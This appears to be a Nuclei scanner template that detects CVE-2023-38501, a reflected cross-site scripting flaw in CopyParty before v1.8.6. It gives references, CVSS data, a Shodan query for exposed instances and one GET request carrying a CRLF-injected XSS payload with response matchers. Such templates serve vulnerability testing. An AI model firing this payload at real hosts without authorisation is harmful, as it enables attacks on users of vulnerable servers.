id: CVE-2023-38501 info: name: CopyParty v1.8.6 - Cross Site Scripting author: ctflearner,r3Y3r53 severity: medium description: | Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. remediation: Fixed in v1.8.6 reference: - https://www.exploit-db.com/exploits/51635 - https://github.com/9001/copyparty/releases/tag/v1.8.6 - https://nvd.nist.gov/vuln/detail/CVE-2023-38501 - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 epss-score: 0.00282 epss-percentile: 0.64989 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty shodan-query: title:"copyparty" tags: packetstorm,cve,cve2023,copyparty,xss,oss,copyparty_project http: - method: GET path: - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "","\">go to")' condition: and # digest: 490a004630440220308a6bffc8f6b07ad7a0f5dd2de57cf8e49937272971cbaa054022fcbc3b7d1d022064e62dc7b7dcbc31b514b272870dd014cd368b175aef7f6c3e38edcf3f07d4b3:922c64590222798bb761d5b6d8e72950